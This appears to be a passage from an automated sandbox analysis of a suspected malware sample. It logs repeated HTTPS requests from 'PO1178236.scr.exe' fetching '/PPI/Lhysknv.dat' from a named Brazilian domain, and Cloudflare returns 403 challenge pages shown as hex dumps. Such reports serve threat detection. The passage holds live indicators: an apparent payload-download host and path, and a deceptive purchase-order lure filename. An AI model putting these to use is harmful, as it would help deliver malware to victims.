        2025-01-09 07:36:41 UTC1369INData Raw: 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70
        Data Ascii: cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.cap
        2025-01-09 07:36:41 UTC1369INData Raw: 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 66 65 33 65 64 36 64 65 39 61 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e
        Data Ascii: -left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1fe3ed6de9a</strong></span> <span class="cf-footer-separator sm:hidden
        2025-01-09 07:36:41 UTC1000INData Raw: 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 66 65 33 65 64 36 64 65 39 61 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 77 4d 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72
        Data Ascii: ndow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1fe3ed6de9a',t:'MTczNjQwODIwMS4wMDAwMDA='};var
        2025-01-09 07:36:41 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        74192.168.2.949782188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:42 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:42 UTC1011INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:42 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:57 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8lO%2FYOM5cUS5TUw1AfehM6Quz51YbjoTizqqrWoS7%2FnbA9vKn%2F70hM8FOgBrsUCWHptxw8KAWjkpMRzWLFFGCJ2JPwChl5r35RTWu%2FN6QfHnuOND%2FuJkKd1TMqmbGP1aO64qd9%2BYOscUCEcY"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2020a7941ff-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=2190&min_rtt=2181&rtt_var=836&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1295474&cwnd=240&unsent_bytes=0&cid=9a29e977c5a74e1b&ts=140&x=0"
        2025-01-09 07:36:42 UTC358INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:42 UTC1369INData Raw: 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74
        Data Ascii: loudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="widt
        2025-01-09 07:36:42 UTC1369INData Raw: 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f
        Data Ascii: tion cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /
        2025-01-09 07:36:42 UTC1369INData Raw: 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 30 32 30 61 37 39 34 31 66 66 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69
        Data Ascii: text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2020a7941ff</strong></span> <span class="cf-footer-separator sm:hi
        2025-01-09 07:36:42 UTC1004INData Raw: 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 30 32 30 61 37 39 34 31 66 66 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 77 4d 69 34 77 4d 44 41 77 4d 44 41 3d 27 7d
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2020a7941ff',t:'MTczNjQwODIwMi4wMDAwMDA='}
        2025-01-09 07:36:42 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        75192.168.2.949783188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:43 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:43 UTC1003INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:43 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:58 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=umUiG0qMmEJxjl937DZPLPsoNIEWeUYl%2B129OJvKDXQwjs84RINhrqS6PtgwHEZPRqWD8dHIda84jqK40pjrZUaDlloMq8F9OHiQ9sVHQcdb1rW0OmqebLvZ%2BygqFHI2NBJleSLamgL9aqRS"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c205cff8de93-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1644&min_rtt=1636&rtt_var=630&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1714621&cwnd=248&unsent_bytes=0&cid=dcafdde85260508c&ts=129&x=0"
        2025-01-09 07:36:43 UTC366INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:43 UTC1369INData Raw: 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65
        Data Ascii: e</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device
        2025-01-09 07:36:43 UTC1369INData Raw: 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63 68 61
        Data Ascii: highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha
        2025-01-09 07:36:43 UTC1369INData Raw: 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 30 35 63 66 66 38 64 65 39 33 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62
        Data Ascii: t border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c205cff8de93</strong></span> <span class="cf-footer-separator sm:hidden">&b
        2025-01-09 07:36:43 UTC996INData Raw: 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 30 35 63 66 66 38 64 65 39 33 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 77 4d 79 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64
        Data Ascii: ._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c205cff8de93',t:'MTczNjQwODIwMy4wMDAwMDA='};var a=d
        2025-01-09 07:36:43 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        76192.168.2.949784188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:43 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:43 UTC1013INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:43 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:58 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HhbdHVCNHu%2Fivm9FUumruQ%2FPrVpCh5JvaT3%2FW12keUmYFwCYqK%2B06s3fJkAWXctG%2FBdPN8DdIMbjzdaaCLb9M9U783TET0hANyT8cHNI0js%2FmKJVVYSV7H%2BvQRCpe6Fc86kpfh4vwsxkdf6T"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2099dc743fd-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1567&min_rtt=1566&rtt_var=590&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1848101&cwnd=217&unsent_bytes=0&cid=5cac35a96f9bea6e&ts=142&x=0"
        2025-01-09 07:36:43 UTC356INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:43 UTC1369INData Raw: 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
        Data Ascii: Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="wi
        2025-01-09 07:36:43 UTC1369INData Raw: 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d
        Data Ascii: ection cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>...
        2025-01-09 07:36:43 UTC1369INData Raw: 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 30 39 39 64 63 37 34 33 66 64 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 